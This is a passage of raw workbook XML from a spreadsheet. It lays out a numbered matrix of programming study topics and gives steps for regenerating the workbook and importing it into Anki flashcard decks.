        </is>
      </c>
      <c r="G21" t="inlineStr">
        <is>
          <t>Dynamic programming</t>
        </is>
      </c>
      <c r="H21" t="inlineStr">
        <is>
          <t>Greedy</t>
        </is>
      </c>
      <c r="I21" t="inlineStr">
        <is>
          <t>Graph algorithms</t>
        </is>
      </c>
      <c r="J21" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
      <c r="K21" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="2" t="inlineStr">
        <is>
          <t>3xx</t>
        </is>
      </c>
      <c r="B22" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
      <c r="C22" t="inlineStr">
        <is>
          <t>Scope &amp; closures</t>
        </is>
      </c>
      <c r="D22" t="inlineStr">
        <is>
          <t>Higher-order functions</t>
        </is>
      </c>
      <c r="E22" t="inlineStr">
        <is>
          <t>Purity &amp; side effects</t>
        </is>
      </c>
      <c r="F22" t="inlineStr">
        <is>
          <t>Immutability</t>
        </is>
      </c>
      <c r="G22" t="inlineStr">
        <is>
          <t>Composition &amp; currying</t>
        </is>
      </c>
      <c r="H22" t="inlineStr">
        <is>
          <t>Laziness, iterators &amp; generators</t>
        </is>
      </c>
      <c r="I22" t="inlineStr">
        <is>
          <t>Pattern matching &amp; ADTs</t>
        </is>
      </c>
      <c r="J22" t="inlineStr">
        <is>
          <t>Functional error handling &amp; monads</t>
        </is>
      </c>
      <c r="K22" t="inlineStr">
        <is>
          <t>Type systems &amp; polymorphism</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="2" t="inlineStr">
        <is>
          <t>4xx</t>
        </is>
      </c>
      <c r="B23" t="inlineStr">
        <is>
          <t>Objects, classes &amp; instances</t>
        </is>
      </c>
      <c r="C23" t="inlineStr">
        <is>
          <t>Encapsulation</t>
        </is>
      </c>
      <c r="D23" t="inlineStr">
        <is>
          <t>Inheritance &amp; its pitfalls</t>
        </is>
      </c>
      <c r="E23" t="inlineStr">
        <is>
          <t>Polymorphism &amp; dispatch</t>
        </is>
      </c>
      <c r="F23" t="inlineStr">
        <is>
          <t>Abstraction, interfaces &amp; contracts</t>
        </is>
      </c>
      <c r="G23" t="inlineStr">
        <is>
          <t>Composition &amp; delegation</t>
        </is>
      </c>
      <c r="H23" t="inlineStr">
        <is>
          <t>SOLID: SRP &amp; OCP</t>
        </is>
      </c>
      <c r="I23" t="inlineStr">
        <is>
          <t>SOLID: LSP, ISP &amp; DIP</t>
        </is>
      </c>
      <c r="J23" t="inlineStr">
        <is>
          <t>Object lifecycle &amp; identity</t>
        </is>
      </c>
      <c r="K23" t="inlineStr">
        <is>
          <t>Code smells &amp; refactoring</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="2" t="inlineStr">
        <is>
          <t>5xx</t>
        </is>
      </c>
      <c r="B24" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
      <c r="C24" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
      <c r="D24" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
      <c r="E24" t="inlineStr">
        <is>
          <t>Deadlock, livelock &amp; starvation</t>
        </is>
      </c>
      <c r="F24" t="inlineStr">
        <is>
          <t>Atomics &amp; memory ordering</t>
        </is>
      </c>
      <c r="G24" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
      <c r="H24" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
      <c r="I24" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
      <c r="J24" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
      <c r="K24" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="2" t="inlineStr">
        <is>
          <t>6xx</t>
        </is>
      </c>
      <c r="B25" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
      <c r="C25" t="inlineStr">
        <is>
          <t>Structural patterns</t>
        </is>
      </c>
      <c r="D25" t="inlineStr">
        <is>
          <t>Behavioral patterns I</t>
        </is>
      </c>
      <c r="E25" t="inlineStr">
        <is>
          <t>Behavioral patterns II</t>
        </is>
      </c>
      <c r="F25" t="inlineStr">
        <is>
          <t>Layered &amp; hexagonal architecture</t>
        </is>
      </c>
      <c r="G25" t="inlineStr">
        <is>
          <t>Modularity &amp; dependency injection</t>
        </is>
      </c>
      <c r="H25" t="inlineStr">
        <is>
          <t>UI architectures</t>
        </is>
      </c>
      <c r="I25" t="inlineStr">
        <is>
          <t>Event-driven architecture</t>
        </is>
      </c>
      <c r="J25" t="inlineStr">
        <is>
          <t>Services &amp; API design</t>
        </is>
      </c>
      <c r="K25" t="inlineStr">
        <is>
          <t>Domain-driven design</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="2" t="inlineStr">
        <is>
          <t>7xx</t>
        </is>
      </c>
      <c r="B26" t="inlineStr">
        <is>
          <t>Relational model &amp; SQL</t>
        </is>
      </c>
      <c r="C26" t="inlineStr">
        <is>
          <t>Joins, indexes &amp; query performance</t>
        </is>
      </c>
      <c r="D26" t="inlineStr">
        <is>
          <t>Schema design &amp; normalization</t>
        </is>
      </c>
      <c r="E26" t="inlineStr">
        <is>
          <t>Transactions &amp; ACID</t>
        </is>
      </c>
      <c r="F26" t="inlineStr">
        <is>
          <t>NoSQL families</t>
        </is>
      </c>
      <c r="G26" t="inlineStr">
        <is>
          <t>Caching</t>
        </is>
      </c>
      <c r="H26" t="inlineStr">
        <is>
          <t>Serialization &amp; data formats</t>
        </is>
      </c>
      <c r="I26" t="inlineStr">
        <is>
          <t>Storage engine internals</t>
        </is>
      </c>
      <c r="J26" t="inlineStr">
        <is>
          <t>Analytics &amp; data pipelines</t>
        </is>
      </c>
      <c r="K26" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="2" t="inlineStr">
        <is>
          <t>8xx</t>
        </is>
      </c>
      <c r="B27" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
      <c r="C27" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
      <c r="D27" t="inlineStr">
        <is>
          <t>HTTP &amp; REST</t>
        </is>
      </c>
      <c r="E27" t="inlineStr">
        <is>
          <t>APIs beyond REST</t>
        </is>
      </c>
      <c r="F27" t="inlineStr">
        <is>
          <t>Authentication &amp; authorization</t>
        </is>
      </c>
      <c r="G27" t="inlineStr">
        <is>
          <t>Distributed fundamentals</t>
        </is>
      </c>
      <c r="H27" t="inlineStr">
        <is>
          <t>Replication &amp; partitioning</t>
        </is>
      </c>
      <c r="I27" t="inlineStr">
        <is>
          <t>Resilience patterns</t>
        </is>
      </c>
      <c r="J27" t="inlineStr">
        <is>
          <t>Scaling &amp; delivery</t>
        </is>
      </c>
      <c r="K27" t="inlineStr">
        <is>
          <t>Queues &amp; streaming</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="2" t="inlineStr">
        <is>
          <t>9xx</t>
        </is>
      </c>
      <c r="B28" t="inlineStr">
        <is>
          <t>Testing fundamentals</t>
        </is>
      </c>
      <c r="C28" t="inlineStr">
        <is>
          <t>Test techniques</t>
        </is>
      </c>
      <c r="D28" t="inlineStr">
        <is>
          <t>Debugging</t>
        </is>
      </c>
      <c r="E28" t="inlineStr">
        <is>
          <t>Version control &amp; Git</t>
        </is>
      </c>
      <c r="F28" t="inlineStr">
        <is>
          <t>CI/CD &amp; delivery automation</t>
        </is>
      </c>
      <c r="G28" t="inlineStr">
        <is>
          <t>Security: attack classes</t>
        </is>
      </c>
      <c r="H28" t="inlineStr">
        <is>
          <t>Security: defenses</t>
        </is>
      </c>
      <c r="I28" t="inlineStr">
        <is>
          <t>Performance: measurement</t>
        </is>
      </c>
      <c r="J28" t="inlineStr">
        <is>
          <t>Performance: optimization</t>
        </is>
      </c>
      <c r="K28" t="inlineStr">
        <is>
          <t>Observability &amp; operations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C15"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
  <cols>
    <col width="14" customWidth="1" min="1" max="1"/>
    <col width="10" customWidth="1" min="2" max="2"/>
    <col width="120" customWidth="1" min="3" max="3"/>
  </cols>
  <sheetData>
    <row r="2">
      <c r="A2" t="n">
        <v>1</v>
      </c>
      <c r="B2" t="inlineStr">
        <is>
          <t>csv</t>
        </is>
      </c>
      <c r="C2" t="inlineStr">
        <is>
          <t>programming_millenium.csv is the source of truth - edit it (or the matrix tab, then re-export)</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="n">
        <v>2</v>
      </c>
      <c r="B3" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="C3" t="inlineStr">
        <is>
          <t>run build.py to regenerate this workbook and export_for_anki/*.csv (already UTF-8, no notepad step needed)</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="n">
        <v>3</v>
      </c>
      <c r="B4" t="inlineStr">
        <is>
          <t>anki</t>
        </is>
      </c>
      <c r="C4" t="inlineStr">
        <is>
          <t>create new deck 'Programming Millenium'</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="n">
        <v>4</v>
      </c>
      <c r="B5" t="inlineStr">
        <is>
          <t>anki</t>
        </is>
      </c>
      <c r="C5" t="inlineStr">
        <is>
          <t>tools -&gt; manage note types -&gt; add (clone basic) -&gt; rename -&gt; fields: Code, Concept, Anchor, Definition, Example, Confusables</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="n">
        <v>5</v>
      </c>
      <c r="B6" t="inlineStr">
        <is>
          <t>anki</t>
        </is>
      </c>
      <c r="C6" t="inlineStr">
        <is>
          <t>cards: front = {{Code}} (and a second template front = {{Concept}}), back = the rest</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="n">
        <v>6</v>
      </c>
      <c r="B7" t="inlineStr">
        <is>
          <t>anki</t>
        </is>
      </c>
      <c r="C7" t="inlineStr">
        <is>
          <t>file -&gt; import each export_for_anki/*.csv (semicolon-separated, fields mapped in order) into a subdeck per hundred</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr"/>
      <c r="B8" t="inlineStr">
        <is>
          <t>tip</t>
        </is>
      </c>
      <c r="C8" t="inlineStr">
        <is>
          <t>concat like the original: front can be Code &amp; " " &amp; Concept</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr"/>
      <c r="B9" t="inlineStr"/>
      <c r="C9" t="inlineStr"/>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>3rd way</t>
        </is>
      </c>
      <c r="B10" t="inlineStr">
        <is>
          <t>excel</t>
        </is>
      </c>
      <c r="C10" t="inlineStr">
        <is>
          <t>multi-card import (see README 'Pathway 3'): save the matrix tab as tab-delimited .txt, re-saved as UTF-8</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" t="inlineStr">
        <is>
          <t>3rd way</t>
        </is>
      </c>
      <c r="B11" t="inlineStr">
        <is>
          <t>anki</t>
        </is>
      </c>
      <c r="C11" t="inlineStr">
        <is>
          <t>manage note types -&gt; clone Basic (the '10 Question' type is not in the repo - recreating it IS these steps) -&gt; fields = Code, Concept, Anchor, Definition, Example, Confusables IN COLUMN ORDER</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" t="inlineStr">
        <is>
          <t>3rd way</t>
        </is>
      </c>
      <c r="B12" t="inlineStr">
        <is>
          <t>anki</t>
        </is>
      </c>
      <c r="C12" t="inlineStr">
        <is>
          <t>cards: one template per question, front wrapped in a conditional so blanks make no card: {{#Definition}}Definition of {{Code}} {{Concept}}?{{/Definition}}</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" t="inlineStr">
        <is>
          <t>3rd way</t>
        </is>
      </c>
      <c r="B13" t="inlineStr">
        <is>
          <t>anki</t>
        </is>
      </c>
      <c r="C13" t="inlineStr">
        <is>
          <t>back: {{FrontSide}} &lt;hr id=answer&gt; {{Definition}} - repeat per column; reverse card {{#Concept}}Address of {{Concept}}?{{/Concept}} -&gt; {{Code}}</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" t="inlineStr">
        <is>
          <t>3rd way</t>
        </is>
      </c>
      <c r="B14" t="inlineStr">
        <is>
          <t>anki</t>
        </is>
      </c>
      <c r="C14" t="inlineStr">
        <is>
          <t>file -&gt; import the .txt (separator Tab, note type = the clone, fields map in order); each note yields one card per non-blank template</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" t="inlineStr">
        <is>
          <t>more advanced</t>
        </is>
      </c>
      <c r="B15" t="inlineStr">
        <is>
          <t>youtube</t>
        </is>
      </c>
      <c r="C15" t="inlineStr">
        <is>
          <t>Converting a COMPLEX Excel file to an Anki deck! - YouTube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2026-07-13T15:40:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-13T15:40:16Z</dcterms:modified>
</cp:coreProperties>
</file>